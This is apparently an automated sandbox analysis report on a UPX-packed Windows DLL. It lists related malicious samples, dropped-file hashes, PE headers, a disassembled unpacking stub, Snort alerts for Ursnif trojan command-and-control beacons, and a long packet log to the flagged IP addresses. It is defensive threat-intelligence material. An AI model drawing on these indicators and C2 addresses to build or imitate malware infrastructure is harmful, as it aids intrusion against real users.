MICROSOFT-CORP-MSN-AS-BLOCKUS	sud-life-mobcast.apk	Get hash	malicious	Browse	104.45.180.93
	sud-life-outwork.apk	Get hash	malicious	Browse	104.45.180.93
	Flwphoptcdyxlxhpejlfjgmsyzqkhoqweu.exe	Get hash	malicious	Browse	20.80.30.45
	2790000.dll	Get hash	malicious	Browse	40.101.136.2
	2770174.dll	Get hash	malicious	Browse	40.101.136.2
	60e40fb428612.dll	Get hash	malicious	Browse	52.97.201.18
	9cYXsscTTT.exe	Get hash	malicious	Browse	104.42.151.234
	TestTakerSBBrowser.exe	Get hash	malicious	Browse	137.117.66.167
	mJSDCeNxFi.exe	Get hash	malicious	Browse	40.88.32.150
	oEE058tCoG.exe	Get hash	malicious	Browse	40.93.212.0
	zHUScMPOlZ.dll	Get hash	malicious	Browse	40.97.116.82
	hsIF8b0YX1.msi	Get hash	malicious	Browse	191.235.71.131
	x86_x64_setup.exe	Get hash	malicious	Browse	104.43.193.48
	h3hlbLDpl8.exe	Get hash	malicious	Browse	13.64.90.137
	PAYMENT.HTML	Get hash	malicious	Browse	13.71.84.154
	JOB-in.line e.K.- Purchase Order 19600396 & 19600397.xlsx.exe	Get hash	malicious	Browse	13.82.24.228
	y3sBoQe6u7.exe	Get hash	malicious	Browse	52.170.189.162
	NC46O8xw5Z.exe	Get hash	malicious	Browse	52.170.189.162
	input.06.21.doc	Get hash	malicious	Browse	52.109.32.41
	PaymentConfirmation.pdf.exe	Get hash	malicious	Browse	13.90.75.180

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{BD6AF35A-DF4A-11EB-90E5-ECF4BB570DC9}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	50344
Entropy (8bit):	2.003853863777815
Encrypted:	false
SSDEEP:	96:ryZlZW2OWEtfbfOq5KMvhqUhQAoxhHS7c3MVs7c8w7Uksw7UONvjaUntvHaaI1v8:ryZlZW2OWEtDfONMgbzJMj/N1tw/o7og
MD5:	1B2C08B04283EF2331ACDE91B8BBCB4D
SHA1:	43A807C8569A26885E912103F9D6D63547638D07
SHA-256:	77E5A7867B6DA6BC138D8896ACB6DE61361F526F8CA51CE601A9E68DC95E6992
SHA-512:	9FA7CD627AAEC7EF1B91992798BE68E7E8FA91E5D9390CD925E2E8457F3EF83B37C7EFCD81CDF11BA26FFBEE205828C74B771815C9A970451DC2178837BE0C59
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{BD6AF35C-DF4A-11EB-90E5-ECF4BB570DC9}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27384
Entropy (8bit):	1.848069425899241
Encrypted:	false
SSDEEP:	96:rBZqQ+6sBSdj32DWuMyywBSlHGd9sRwBSlHGd9gSlZA:rBZqQ+6skdj32DWuMyyw2HK+Rw2HKLZA
MD5:	ABBBABDCEF013C7360EF262DA94D0BB1
SHA1:	7886E7C0D416567109ED45A58EB4C63AEC4DA13D
SHA-256:	5F82BCE7575218FED78D6771274A7CE3F2F9450019B37CA1A44043E2DE1B67AD
SHA-512:	8291D7D23C35B5B0F5B6A61C70D230968DBD70E0E1700EBC282F4B3F5291DBC87FEB2363F03A2E152C70AC4ADF2691F1F493798A41BB960CD8A6D3EF3CC31B24
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{BD6AF35E-DF4A-11EB-90E5-ECF4BB570DC9}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27376
Entropy (8bit):	1.8498140810925014
Encrypted:	false
SSDEEP:	96:rnZfQj6tBSHjp2BWBMXa6lBlfcFXgxlBlfcFXAl4A:rnZfQj6tkHjp2BWBMXa6lzfHxlzfb4A
MD5:	E314AEEF8885724C4F91A74CBF288AAE
SHA1:	C299E34AFACD5E67A2748443AE4F3D71D1213174
SHA-256:	3DC9BB6E88346FF7285AA2B7BE18C8FA94331C42DD48253FBC3436DFB8BF4F00
SHA-512:	5F8250CF15954ABC4BB60ACB1ACF7952D010260D8235530CE4EFD02F30391E33C9E2F50CB2997E1F86CD442A7F660D2FF01C482CEF93D11C50606E1598ECECB9
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\JavaDeployReg.log Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	89
Entropy (8bit):	4.429518442893874
Encrypted:	false
SSDEEP:	3:oVXUdUbXIyB8JOGXnEdUbXIy6j+n:o9UVQqEVi
MD5:	7551EDFC2A095038308DE03A979AEA3B
SHA1:	28A3E4408ABBD841E14B80C82D712894D7480A73
SHA-256:	FD0B2F23730CC3AAAFEB969CE5AFF07BAD4CA1EDA987671346FE6513CB7AFDD6
SHA-512:	96F41AF45753FAFA2DAA35022B02841153EE8C98894ED530A8F16C72B5FC7774FDEF2C0A8211843F4059E613087DB806F685CE058F6B9C782AAB30614607EA12
Malicious:	false
Preview:	[2021/07/07 10:42:49.331] Latest deploy version: ..[2021/07/07 10:42:49.331] 11.211.2 ..

C:\Users\user\AppData\Local\Temp\~DF3A99C7AD2702480D.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39649
Entropy (8bit):	0.5767042893555584
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+NTRwzRlBlfcFX2lBlfcFX+lBlfcFX3:kBqoxKAuqR+NTRwzRlzfrlzf3lzf8
MD5:	5E4E8D633EEC37451CA584FB977CD2A3
SHA1:	F2FDC159F116F1F666876081CD57C21FF4D6F629
SHA-256:	54912DA24BE3C7F0278AFF9A7FA3748F20BB70B7A444BB6D36219E8F5BAF910E
SHA-512:	7E54E62E35EB7DF22657B5BD7374BF2634C9C0DBFFD8497175740591CB19AE20193A72555931D96A1B958AC9333606CE6D4A9264F4B10EC2A5DB786A015AF97C
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF48F8DB99852E5824.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	13237
Entropy (8bit):	0.6015770581866133
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9lo59loZ9lWN5iG5PA:kBqoIC8N5iG5PA
MD5:	48DB8549900DAE5BC2552D048ED02C3F
SHA1:	6C535A402C05BF8FEFC3500973D9F4393FC67277
SHA-256:	3DB755B3A9C5F18FE0694056E963504C59603244F11C801A72991E62CA219BC6
SHA-512:	0792497457374046404D96816FCA01748D62D3CC87FA6E5AC22B3593D55E707E89A2EE3FEA72DC7C07A6ED6D27944FF062C781B334E06C7A871A88AFBF418890
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFBADD8EC8FEBD51BA.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39665
Entropy (8bit):	0.576637477758457
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+uoCLYewBSlHGd9uwBSlHGd9+wBSlHGd93:kBqoxKAuqR+uoCLYew2HK0w2HK0w2HK1
MD5:	3252CDAF94741DE42A0C2C0887F7B2AA
SHA1:	917057587119E9A2610A30B1F1538C94B99E6179
SHA-256:	DBDD2E68C5A55AD1E178E0860709F5D0AB2205E30D8D0FF184B95D39DD820087
SHA-512:	15321A223617B5C9296F57B79AAF13884F8427488F380BE084BA9A19BF9EBA0C4B0518D6D9F4D0B3EEE6C3FD31795D593F8DBD107ADB8C865CABA1F13C9B1887
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
Entropy (8bit):	7.907972335888756
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 96.66% UPX compressed Win32 Executable (30571/9) 2.95% Generic Win/DOS Executable (2004/3) 0.19% DOS Executable Generic (2002/1) 0.19% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	5.dll
File size:	227342
MD5:	fceb6a51be4205d11be1491f6e263cae
SHA1:	0abb60d37fac49912172c5385ff58e049520eb53
SHA256:	c521dd937ce9b2e8bda2fa915bae5b5be0e150a8b82e3b2bfb1cdbc60a8326c4
SHA512:	0dd278f5499a28f3ae536fd1870cbedbfb1da34f07d9210f09b86c5167d04be4f0eb1ffbcb922d3b01afe83cf9cd9f620e5c4abf0a27a569c954e6d7cc9451e7
SSDEEP:	3072:Ndmt0uTpBxy1mXhKvuE3GThWccntEvAJjHPLpvLHMwsJyV/vl5PX8J/g9vN:N85ykhKWE3UhwmMjjpvjMwskD5f8JsvN
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~@........................................D...................................................Rich............PE..L......S...

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x10facd0
Entrypoint Section:	UPX1
Digitally signed:	false
Imagebase:	0x1000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5396CBB2 [Tue Jun 10 09:11:14 2014 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	ea5307b4a63215686c0cdc83cff5fcba

Entrypoint Preview

Instruction
cmp byte ptr [esp+08h], 00000001h
jne 00007FA454D122CFh
pushad
mov esi, 010C4000h
lea edi, dword ptr [esi-000C3000h]
push edi
jmp 00007FA454D12102h
nop
nop
nop
nop
nop
nop
mov al, byte ptr [esi]
inc esi
mov byte ptr [edi], al
inc edi
add ebx, ebx
jne 00007FA454D120F9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007FA454D120DFh
mov eax, 00000001h
add ebx, ebx
jne 00007FA454D120F9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
add ebx, ebx
jnc 00007FA454D120FDh
jne 00007FA454D1211Ah
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007FA454D12111h
dec eax
add ebx, ebx
jne 00007FA454D120F9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
jmp 00007FA454D120C6h
add ebx, ebx
jne 00007FA454D120F9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
jmp 00007FA454D12144h
xor ecx, ecx
sub eax, 03h
jc 00007FA454D12103h
shl eax, 08h
mov al, byte ptr [esi]
inc esi
xor eax, FFFFFFFFh
je 00007FA454D12167h
sar eax, 1
mov ebp, eax
jmp 00007FA454D120FDh
add ebx, ebx
jne 00007FA454D120F9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007FA454D120BEh
inc ecx
add ebx, ebx
jne 00007FA454D120F9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007FA454D120B0h
add ebx, ebx
jne 00007FA454D120F9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
add ebx, ebx
jnc 00007FA454D120E1h
jne 00007FA454D120FBh
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jnc 00007FA454D120D6h
add ecx, 02h
cmp ebp, 00000000h

Rich Headers

Programming Language:

[EXP] VS2013 UPD3 build 30723
[LNK] VS2013 UPD3 build 30723
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ASM] VS2013 build 21005
[C++] VS2013 UPD3 build 30723
[RES] VS2013 build 21005
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0xfb2b4	0x80	.rsrc
IMAGE_DIRECTORY_ENTRY_IMPORT	0xfb1dc	0xd8	.rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xfb000	0x1dc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xfb334	0x10	.rsrc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xfaebc	0x48	UPX1
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
UPX0	0x1000	0xc3000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
UPX1	0xc4000	0x37000	0x37000	False	0.987744140625	data	7.91565633635	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0xfb000	0x1000	0x400	False	0.490234375	data	4.47756536718	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_MANIFEST	0xfb05c	0x17d	XML 1.0 document text	English	United States

Imports

DLL	Import
GDI32.dll	PatBlt
KERNEL32.DLL	LoadLibraryA, GetProcAddress, VirtualProtect
USER32.dll	GetWindowRect

Exports

Name	Ordinal	Address
Clockcondition	1	0x1021070
Dogwhen	2	0x1021fa0
Sing	3	0x1022080
Wholegray	4	0x1022270

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
07/07/21-10:42:51.274973	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49721	80	192.168.2.5	40.97.116.82
07/07/21-10:42:51.274973	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49721	80	192.168.2.5	40.97.116.82

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 7, 2021 10:42:51.090818882 CEST	49720	80	192.168.2.5	40.97.116.82
Jul 7, 2021 10:42:51.090912104 CEST	49721	80	192.168.2.5	40.97.116.82
Jul 7, 2021 10:42:51.272027016 CEST	80	49721	40.97.116.82	192.168.2.5
Jul 7, 2021 10:42:51.272280931 CEST	49721	80	192.168.2.5	40.97.116.82
Jul 7, 2021 10:42:51.272367954 CEST	80	49720	40.97.116.82	192.168.2.5
Jul 7, 2021 10:42:51.272512913 CEST	49720	80	192.168.2.5	40.97.116.82
Jul 7, 2021 10:42:51.274972916 CEST	49721	80	192.168.2.5	40.97.116.82
Jul 7, 2021 10:42:51.455990076 CEST	80	49721	40.97.116.82	192.168.2.5
Jul 7, 2021 10:42:51.456219912 CEST	49721	80	192.168.2.5	40.97.116.82
Jul 7, 2021 10:42:51.456922054 CEST	49721	80	192.168.2.5	40.97.116.82
Jul 7, 2021 10:42:51.494256020 CEST	49722	443	192.168.2.5	40.97.116.82
Jul 7, 2021 10:42:51.636159897 CEST	80	49721	40.97.116.82	192.168.2.5
Jul 7, 2021 10:42:51.676846981 CEST	443	49722	40.97.116.82	192.168.2.5
Jul 7, 2021 10:42:51.680841923 CEST	49722	443	192.168.2.5	40.97.116.82
Jul 7, 2021 10:42:51.827325106 CEST	49722	443	192.168.2.5	40.97.116.82
Jul 7, 2021 10:42:52.014647961 CEST	443	49722	40.97.116.82	192.168.2.5
Jul 7, 2021 10:42:52.014681101 CEST	443	49722	40.97.116.82	192.168.2.5
Jul 7, 2021 10:42:52.014705896 CEST	443	49722	40.97.116.82	192.168.2.5
Jul 7, 2021 10:42:52.014846087 CEST	49722	443	192.168.2.5	40.97.116.82
Jul 7, 2021 10:42:52.014877081 CEST	49722	443	192.168.2.5	40.97.116.82
Jul 7, 2021 10:42:52.081208944 CEST	49722	443	192.168.2.5	40.97.116.82
Jul 7, 2021 10:42:52.093198061 CEST	49722	443	192.168.2.5	40.97.116.82
Jul 7, 2021 10:42:52.265033007 CEST	443	49722	40.97.116.82	192.168.2.5
Jul 7, 2021 10:42:52.265264988 CEST	49722	443	192.168.2.5	40.97.116.82
Jul 7, 2021 10:42:52.278367996 CEST	443	49722	40.97.116.82	192.168.2.5
Jul 7, 2021 10:42:52.278536081 CEST	49722	443	192.168.2.5	40.97.116.82
Jul 7, 2021 10:42:52.376544952 CEST	49722	443	192.168.2.5	40.97.116.82
Jul 7, 2021 10:42:52.559003115 CEST	443	49722	40.97.116.82	192.168.2.5
Jul 7, 2021 10:42:53.386189938 CEST	49723	443	192.168.2.5	40.101.137.98
Jul 7, 2021 10:42:53.387068033 CEST	49724	443	192.168.2.5	40.101.137.98
Jul 7, 2021 10:42:53.435702085 CEST	443	49723	40.101.137.98	192.168.2.5
Jul 7, 2021 10:42:53.435808897 CEST	49723	443	192.168.2.5	40.101.137.98
Jul 7, 2021 10:42:53.436583996 CEST	49723	443	192.168.2.5	40.101.137.98
Jul 7, 2021 10:42:53.436794996 CEST	443	49724	40.101.137.98	192.168.2.5
Jul 7, 2021 10:42:53.436893940 CEST	49724	443	192.168.2.5	40.101.137.98
Jul 7, 2021 10:42:53.437544107 CEST	49724	443	192.168.2.5	40.101.137.98
Jul 7, 2021 10:42:53.486001015 CEST	443	49723	40.101.137.98	192.168.2.5
Jul 7, 2021 10:42:53.486032963 CEST	443	49723	40.101.137.98	192.168.2.5
Jul 7, 2021 10:42:53.486056089 CEST	443	49723	40.101.137.98	192.168.2.5
Jul 7, 2021 10:42:53.486118078 CEST	49723	443	192.168.2.5	40.101.137.98
Jul 7, 2021 10:42:53.486159086 CEST	49723	443	192.168.2.5	40.101.137.98
Jul 7, 2021 10:42:53.497411013 CEST	443	49724	40.101.137.98	192.168.2.5
Jul 7, 2021 10:42:53.497447968 CEST	443	49724	40.101.137.98	192.168.2.5
Jul 7, 2021 10:42:53.497472048 CEST	443	49724	40.101.137.98	192.168.2.5
Jul 7, 2021 10:42:53.497551918 CEST	49724	443	192.168.2.5	40.101.137.98
Jul 7, 2021 10:42:53.497587919 CEST	49724	443	192.168.2.5	40.101.137.98
Jul 7, 2021 10:42:53.499181032 CEST	49723	443	192.168.2.5	40.101.137.98
Jul 7, 2021 10:42:53.499806881 CEST	49723	443	192.168.2.5	40.101.137.98
Jul 7, 2021 10:42:53.506491899 CEST	49724	443	192.168.2.5	40.101.137.98
Jul 7, 2021 10:42:53.546751022 CEST	443	49723	40.101.137.98	192.168.2.5
Jul 7, 2021 10:42:53.547455072 CEST	443	49723	40.101.137.98	192.168.2.5
Jul 7, 2021 10:42:53.547595978 CEST	49723	443	192.168.2.5	40.101.137.98
Jul 7, 2021 10:42:53.549876928 CEST	443	49723	40.101.137.98	192.168.2.5
Jul 7, 2021 10:42:53.549968958 CEST	49723	443	192.168.2.5	40.101.137.98
Jul 7, 2021 10:42:53.550431967 CEST	49723	443	192.168.2.5	40.101.137.98
Jul 7, 2021 10:42:53.554781914 CEST	443	49724	40.101.137.98	192.168.2.5
Jul 7, 2021 10:42:53.555263996 CEST	49724	443	192.168.2.5	40.101.137.98
Jul 7, 2021 10:42:53.597332954 CEST	443	49723	40.101.137.98	192.168.2.5
Jul 7, 2021 10:42:54.063404083 CEST	49725	443	192.168.2.5	52.97.233.2
Jul 7, 2021 10:42:54.063575029 CEST	49726	443	192.168.2.5	52.97.233.2
Jul 7, 2021 10:42:54.110462904 CEST	443	49725	52.97.233.2	192.168.2.5
Jul 7, 2021 10:42:54.110488892 CEST	443	49726	52.97.233.2	192.168.2.5
Jul 7, 2021 10:42:54.110635042 CEST	49725	443	192.168.2.5	52.97.233.2
Jul 7, 2021 10:42:54.112159014 CEST	49726	443	192.168.2.5	52.97.233.2
Jul 7, 2021 10:42:54.115689993 CEST	49725	443	192.168.2.5	52.97.233.2
Jul 7, 2021 10:42:54.116274118 CEST	49726	443	192.168.2.5	52.97.233.2
Jul 7, 2021 10:42:54.163465977 CEST	443	49725	52.97.233.2	192.168.2.5
Jul 7, 2021 10:42:54.163490057 CEST	443	49725	52.97.233.2	192.168.2.5
Jul 7, 2021 10:42:54.163506031 CEST	443	49725	52.97.233.2	192.168.2.5
Jul 7, 2021 10:42:54.163583040 CEST	443	49726	52.97.233.2	192.168.2.5
Jul 7, 2021 10:42:54.163592100 CEST	49725	443	192.168.2.5	52.97.233.2
Jul 7, 2021 10:42:54.163613081 CEST	443	49726	52.97.233.2	192.168.2.5
Jul 7, 2021 10:42:54.163621902 CEST	49725	443	192.168.2.5	52.97.233.2
Jul 7, 2021 10:42:54.163638115 CEST	443	49726	52.97.233.2	192.168.2.5
Jul 7, 2021 10:42:54.163681030 CEST	49726	443	192.168.2.5	52.97.233.2
Jul 7, 2021 10:42:54.163696051 CEST	49726	443	192.168.2.5	52.97.233.2
Jul 7, 2021 10:42:54.547020912 CEST	49725	443	192.168.2.5	52.97.233.2
Jul 7, 2021 10:42:54.547854900 CEST	49725	443	192.168.2.5	52.97.233.2
Jul 7, 2021 10:42:54.569293022 CEST	49726	443	192.168.2.5	52.97.233.2
Jul 7, 2021 10:42:54.600734949 CEST	443	49725	52.97.233.2	192.168.2.5
Jul 7, 2021 10:42:54.601027966 CEST	443	49725	52.97.233.2	192.168.2.5
Jul 7, 2021 10:42:54.601119995 CEST	49725	443	192.168.2.5	52.97.233.2
Jul 7, 2021 10:42:54.619752884 CEST	443	49726	52.97.233.2	192.168.2.5
Jul 7, 2021 10:42:54.619885921 CEST	49726	443	192.168.2.5	52.97.233.2
Jul 7, 2021 10:42:54.623085976 CEST	443	49725	52.97.233.2	192.168.2.5
Jul 7, 2021 10:42:54.623105049 CEST	443	49725	52.97.233.2	192.168.2.5
Jul 7, 2021 10:42:54.623250961 CEST	49725	443	192.168.2.5	52.97.233.2
Jul 7, 2021 10:42:56.625698090 CEST	49727	443	192.168.2.5	40.97.116.82
Jul 7, 2021 10:42:56.648083925 CEST	49728	443	192.168.2.5	40.97.116.82
Jul 7, 2021 10:42:56.718204975 CEST	49720	80	192.168.2.5	40.97.116.82
Jul 7, 2021 10:42:56.718823910 CEST	49724	443	192.168.2.5	40.101.137.98
Jul 7, 2021 10:42:56.718935013 CEST	49726	443	192.168.2.5	52.97.233.2
Jul 7, 2021 10:42:56.719031096 CEST	49725	443	192.168.2.5	52.97.233.2
Jul 7, 2021 10:42:56.804682970 CEST	443	49727	40.97.116.82	192.168.2.5
Jul 7, 2021 10:42:56.804963112 CEST	49727	443	192.168.2.5	40.97.116.82
Jul 7, 2021 10:42:56.827092886 CEST	443	49728	40.97.116.82	192.168.2.5
Jul 7, 2021 10:42:56.827358007 CEST	49728	443	192.168.2.5	40.97.116.82
Jul 7, 2021 10:42:56.850275040 CEST	49728	443	192.168.2.5	40.97.116.82
Jul 7, 2021 10:42:56.850389004 CEST	49727	443	192.168.2.5	40.97.116.82
Jul 7, 2021 10:42:57.031389952 CEST	443	49728	40.97.116.82	192.168.2.5
Jul 7, 2021 10:42:57.031430006 CEST	443	49728	40.97.116.82	192.168.2.5
Jul 7, 2021 10:42:57.031450033 CEST	443	49728	40.97.116.82	192.168.2.5
Jul 7, 2021 10:42:57.031572104 CEST	49728	443	192.168.2.5	40.97.116.82
Jul 7, 2021 10:42:57.031594992 CEST	443	49727	40.97.116.82	192.168.2.5
Jul 7, 2021 10:42:57.031615019 CEST	443	49727	40.97.116.82	192.168.2.5
Jul 7, 2021 10:42:57.031630993 CEST	443	49727	40.97.116.82	192.168.2.5
Jul 7, 2021 10:42:57.031656027 CEST	49728	443	192.168.2.5	40.97.116.82
Jul 7, 2021 10:42:57.031779051 CEST	49727	443	192.168.2.5	40.97.116.82
Jul 7, 2021 10:42:57.070467949 CEST	49728	443	192.168.2.5	40.97.116.82
Jul 7, 2021 10:42:57.070512056 CEST	49727	443	192.168.2.5	40.97.116.82
Jul 7, 2021 10:42:57.078717947 CEST	49728	443	192.168.2.5	40.97.116.82
Jul 7, 2021 10:42:57.250322104 CEST	443	49728	40.97.116.82	192.168.2.5
Jul 7, 2021 10:42:57.250416040 CEST	49728	443	192.168.2.5	40.97.116.82
Jul 7, 2021 10:42:57.250737906 CEST	443	49727	40.97.116.82	192.168.2.5
Jul 7, 2021 10:42:57.250828028 CEST	49727	443	192.168.2.5	40.97.116.82
Jul 7, 2021 10:42:57.259902954 CEST	443	49728	40.97.116.82	192.168.2.5
Jul 7, 2021 10:42:57.260294914 CEST	49728	443	192.168.2.5	40.97.116.82
Jul 7, 2021 10:42:57.260329962 CEST	49728	443	192.168.2.5	40.97.116.82
Jul 7, 2021 10:42:57.327436924 CEST	49729	443	192.168.2.5	52.97.152.210
Jul 7, 2021 10:42:57.327761889 CEST	49730	443	192.168.2.5	52.97.152.210
Jul 7, 2021 10:42:57.372603893 CEST	443	49729	52.97.152.210	192.168.2.5
Jul 7, 2021 10:42:57.372710943 CEST	443	49730	52.97.152.210	192.168.2.5
Jul 7, 2021 10:42:57.372710943 CEST	49729	443	192.168.2.5	52.97.152.210
Jul 7, 2021 10:42:57.372786999 CEST	49730	443	192.168.2.5	52.97.152.210
Jul 7, 2021 10:42:57.373833895 CEST	49729	443	192.168.2.5	52.97.152.210
Jul 7, 2021 10:42:57.373913050 CEST	49730	443	192.168.2.5	52.97.152.210
Jul 7, 2021 10:42:57.420603991 CEST	443	49729	52.97.152.210	192.168.2.5
Jul 7, 2021 10:42:57.420639992 CEST	443	49729	52.97.152.210	192.168.2.5
Jul 7, 2021 10:42:57.420808077 CEST	49729	443	192.168.2.5	52.97.152.210
Jul 7, 2021 10:42:57.420820951 CEST	443	49729	52.97.152.210	192.168.2.5
Jul 7, 2021 10:42:57.420826912 CEST	49729	443	192.168.2.5	52.97.152.210
Jul 7, 2021 10:42:57.420969009 CEST	49729	443	192.168.2.5	52.97.152.210
Jul 7, 2021 10:42:57.421335936 CEST	443	49730	52.97.152.210	192.168.2.5
Jul 7, 2021 10:42:57.421390057 CEST	443	49730	52.97.152.210	192.168.2.5
Jul 7, 2021 10:42:57.421423912 CEST	443	49730	52.97.152.210	192.168.2.5
Jul 7, 2021 10:42:57.423101902 CEST	49730	443	192.168.2.5	52.97.152.210
Jul 7, 2021 10:42:57.423132896 CEST	49730	443	192.168.2.5	52.97.152.210
Jul 7, 2021 10:42:57.434680939 CEST	49730	443	192.168.2.5	52.97.152.210
Jul 7, 2021 10:42:57.434770107 CEST	49729	443	192.168.2.5	52.97.152.210
Jul 7, 2021 10:42:57.435750008 CEST	49730	443	192.168.2.5	52.97.152.210
Jul 7, 2021 10:42:57.439167976 CEST	443	49728	40.97.116.82	192.168.2.5
Jul 7, 2021 10:42:57.480983973 CEST	443	49730	52.97.152.210	192.168.2.5
Jul 7, 2021 10:42:57.481021881 CEST	443	49729	52.97.152.210	192.168.2.5
Jul 7, 2021 10:42:57.481040955 CEST	443	49730	52.97.152.210	192.168.2.5
Jul 7, 2021 10:42:57.481177092 CEST	49729	443	192.168.2.5	52.97.152.210
Jul 7, 2021 10:42:57.481224060 CEST	49730	443	192.168.2.5	52.97.152.210
Jul 7, 2021 10:42:57.483671904 CEST	443	49730	52.97.152.210	192.168.2.5
Jul 7, 2021 10:42:57.483808994 CEST	49730	443	192.168.2.5	52.97.152.210
Jul 7, 2021 10:42:57.484093904 CEST	49730	443	192.168.2.5	52.97.152.210
Jul 7, 2021 10:42:57.529190063 CEST	443	49730	52.97.152.210	192.168.2.5
Jul 7, 2021 10:42:57.579144001 CEST	49731	443	192.168.2.5	52.97.144.2
